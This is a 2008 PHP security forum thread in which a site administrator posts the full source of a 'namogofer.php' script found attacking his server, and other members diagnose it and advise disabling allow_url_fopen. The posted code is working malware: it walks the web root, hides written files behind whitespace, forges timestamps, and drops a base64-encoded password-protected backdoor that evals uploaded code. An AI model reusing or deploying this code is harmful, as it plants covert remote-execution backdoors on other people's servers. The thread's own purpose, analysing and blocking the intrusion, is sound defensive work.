namogofer.php hacking attempt

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
User avatar
SpecialK
Forum Commoner
Posts: 96
Joined: Mon Sep 18, 2006 3:49 pm

namogofer.php hacking attempt

Post by SpecialK »

I have noticed this hacking attempt at one of our websites. It gives a weird error in the log (about 26k lines in 10 seconds) similar to this:

[client 196.28.230.50] [Time: Mon Mar 10 2008 15:50:38] PHP Notice: Undefined variable: CURFILE in http://www.elettrodataservice.it/foto_a ... aca/a/.php on line 101\n

What this seems to do is hit the website then execute the script at this address. I have gone and manually denied anything from this IP but it appears it spreads based on other sites. The code this is available at this link is below.

Code: Select all

 
error_reporting(1);
 
global $HTTP_SERVER_VARS;
 
$START = time();
$WD_TIMEOUT = array(8,7,6,6,5,5,5,5,0);
 
function my_fwrite($f,$data) { 
  global $CURFILE; 
  $file_mtime = @filemtime($f); 
  $file_atime = @fileatime($f); 
  $dir_mtime = @filemtime(@dirname($f)); 
  $dir_atime = @fileatime(@dirname($f)); 
  if ($file_h = @fopen($f,"wb")){ 
    @fwrite($file_h,$data); 
    @fclose($file_h); 
    if ($file_mtime){ 
      @touch($f,$file_mtime,$file_atime); 
    }elseif(@filemtime($CURFILE)){ 
        @chmod($f,@fileperms($CURFILE)); 
        @touch($f,@filemtime($CURFILE),@fileatime($CURFILE));
        @chgrp($f,@filegroup($CURFILE));
        @chown($f,@fileowner($CURFILE));
    }; 
    if ($dir_mtime) 
      @touch(@dirname($f),$dir_mtime,$dir_atime); 
    return $f; 
  }else{ 
    return ''; 
  }; 
}; 
 
function ext($f){ 
  return substr($f, strrpos($f, ".") + 1); 
}; 
 
function walkdir($p,$func='_walkdir',$l=0){ 
  global $START; 
  global $WD_TIMEOUT; 
  global $FL; 
  $func_f = "{$func}_f"; 
  $func_d = "{$func}_d"; 
  $func_s = "{$func}_s"; 
  $func_e = "{$func}_e"; 
  if ($dh = @opendir("$p")){ 
    if (function_exists($func_s)) { 
      if ($func_s($p,$l)) 
        return 1; 
    }; 
    while ($f = @readdir($dh)){ 
      if (time() - $START >= $WD_TIMEOUT[$l] ) 
        break; 
      if ($f == '.' || $f == '..' ) 
        continue; 
      if (@is_dir ("$p$f/") ) 
        walkdir("$p$f/",$func,$l+1); 
      if (@is_dir ("$p$f/") && function_exists($func_d)) 
        $func_d("$p$f/",$l); 
      if (@is_file("$p$f" ) && function_exists($func_f)) 
        $func_f("$p$f" ,$l); 
    }; 
    closedir($dh); 
      
    if (function_exists($func_e)) 
      $func_e($p,$l); 
  }; 
}; 
  
function r_cut($p){ 
  global $R; 
  return substr($p,strlen($R)); 
};
 
function say($t) { 
  echo "$t\n"; 
}; 
 
function testdata($t) { 
  say(md5("testdata_$t")); 
};
 
$R = $HTTP_SERVER_VARS['DOCUMENT_ROOT']; 
$CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['SCRIPT_NAME']; 
echo "<pre>"; 
testdata('start'); 
$fe = ext($CURFILE); 
if (!$fe) $fe = 'php'; 
$FN = "namogofer.$fe"; 
  
function _walkdir_s($d,$l) { 
  global $FCNT; 
  $FCNT = array('fn' => '','dir' => 0,'file' => 0,'simtype' => 0); 
}; 
  
function _walkdir_d($d,$l) { 
  global $FCNT; 
  $FCNT['dir' ]++; 
 
}; 
function _walkdir_f($f,$l) { global $FCNT; $FCNT['file']++; 
  if (ext($f) == ext($CURFILE)) $FCNT['simtype']++; }; 
 
function _walkdir_e($d,$l) { 
  global $C,$FCNT,$FN; 
  if ($C[$l]<7){ 
    if (my_fwrite("$d$FN",str_repeat("\n",100).str_repeat(' ',150).base64_decode('PD9waHAgZXJyb3JfcmVwb3J0aW5nKDEpO2dsb2JhbCAkSFRUUF9TRVJWRVJfVkFSUzsgZnVuY3Rpb24gc2F5KCR0KSB7IGVjaG8gIiR0XG4iOyB9OyBmdW5jdGlvbiB0ZXN0ZGF0YSgkdCkgeyBzYXkobWQ1KCJ0ZXN0ZGF0YV8kdCIpKTsgfTsgZWNobyAiPHByZT4iOyB0ZXN0ZGF0YSgnc3RhcnQnKTsgaWYgKG1kNSgkX1BPU1RbInAiXSk9PSJhYWNlOTk0MjhjNTBkYmU5NjVhY2M5M2YzZjI3NWNkMyIpeyBpZiAoJGNvZGUgPSBAZnJlYWQoQGZvcGVuKCRIVFRQX1BPU1RfRklMRVNbImYiXVsidG1wX25hbWUiXSwicmIiKSwkSFRUUF9QT1NUX0ZJTEVTWyJmIl1bInNpemUiXSkpeyBldmFsKCRjb2RlKTsgfWVsc2V7IHRlc3RkYXRhKCdmJyk7IH07IH1lbHNleyB0ZXN0ZGF0YSgncGFzcycpOyB9OyB0ZXN0ZGF0YSgnZW5kJyk7IGVjaG8gIjwvcHJlPiI7ID8+').str_repeat(' ',150)."\n".str_repeat("\n",100))){
      $C[$l]++; 
      $FCNT['fn'] = r_cut("$d$FN"); 
      say(implode("\t",$FCNT)); 
    }; 
  }; 
}; 
 
walkdir("$R/"); 
testdata('end'); 
echo "</pre>";                                                                                                                                                      
 
 
 
Is there anything that you may have come across to best lock this down to prevent these attacks? It seems it tries to create these namogofer files and write them to execute something remotely. It can only write to stuff outside the web tree, so PHP isn't executable there without the command line, but I would like to secure the site as best as possible to prevent anything from going wrong because of this.

Checking other logs, it appears to be doing a post to root directories ex. /var /usr etc.
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: namogofer.php hacking attempt

Post by Mordred »

If you see that line in your logs, then the script must be executing. It is a poorly written backdooring attempt. (although well-executed as far as deployment of these things go: http://web.dtbaker.com.au/post/catching ... t_attempts)

The only (somewhat) good thing is that the backdoor is protected with a password, so even if you know the backdoor is there, only the attacker will be able to use the exploit. Or at least until someone catches the bot in a honeypot version of the backdoor and gets the password ;)

So, check which one of your scripts was used for the compromise and fix it.
User avatar
SpecialK
Forum Commoner
Posts: 96
Joined: Mon Sep 18, 2006 3:49 pm

Re: namogofer.php hacking attempt

Post by SpecialK »

I don't seem to be able to track it to one script that could be executing this. The weird part is it's doing a POST, and any unsecured page uses a GET.

What I did track it down, thanks to your link, is that allow_url_fopen is enabled (due to some other sites, we can't turn it off). The trick it seems is turning up security without breaking all the sites
User avatar
SpecialK
Forum Commoner
Posts: 96
Joined: Mon Sep 18, 2006 3:49 pm

Re: namogofer.php hacking attempt

Post by SpecialK »

It took some convincing, but changing a few old scripts with http_get instead of using file_get_contents with a URL

Turning allow_url_fopen off prevented the later attack attempts as they were rejected immediately.

For anyone else who searches this, changing file_get_contents below worked perfect for me.

$out = file_get_contents("http://website");
-----
$url = "http://website";
$out = http_parse_message(http_get($url))->body;


Thanks for your help.
Post Reply